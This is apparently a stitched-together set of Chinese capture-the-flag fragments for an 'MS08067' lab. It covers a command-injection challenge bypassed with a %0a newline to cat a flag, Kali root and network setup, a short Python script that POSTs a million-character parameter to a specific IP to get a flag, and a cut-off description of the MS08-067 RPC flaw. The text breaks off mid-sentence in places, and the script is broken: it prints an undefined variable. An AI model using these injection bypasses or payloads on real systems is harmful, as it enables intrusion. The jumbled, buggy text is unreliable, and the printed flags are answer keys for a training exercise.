打开环境与dvwa的命令注入有点像这里过滤了很多,尝试用%0a来突破能够正常执行命令以后,到根目录去寻找flag直接cat读取flag得到flagMS08067{0d07a0895471478280dd7effeb530ae7}
靶场
环境:
1.kali切换到root权限。有两种方式:直接切换到管理员权限,这种方式虽然比较方便,但是也比较危险,root权限很大,如果有误操作会产生较大的影响;当某些操作需要管理员权限时,临时提权,该操作结束后,恢复普通用户权限。推荐第二种方
sudo su #切换到管理员权限下
sudo ifconfig #临时对ifconfig操作提权
2.将kali和
靶场
winXP设置到同一局域网下,将二者的网络适配器均设置为 仅主机模式。
操作:选中.
这题跟i春秋一题一样直接贴出脚本得到flag
from requests import post
payload = {'greeting':'Merry Christmas'+'a' * 1000000}
r = post('http://106.52.110.188:21028//index.php',data=payload)
print(res.text)
得到flag
MS08067
{5c5766918ed846e3a7e44948f0fed385.
MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利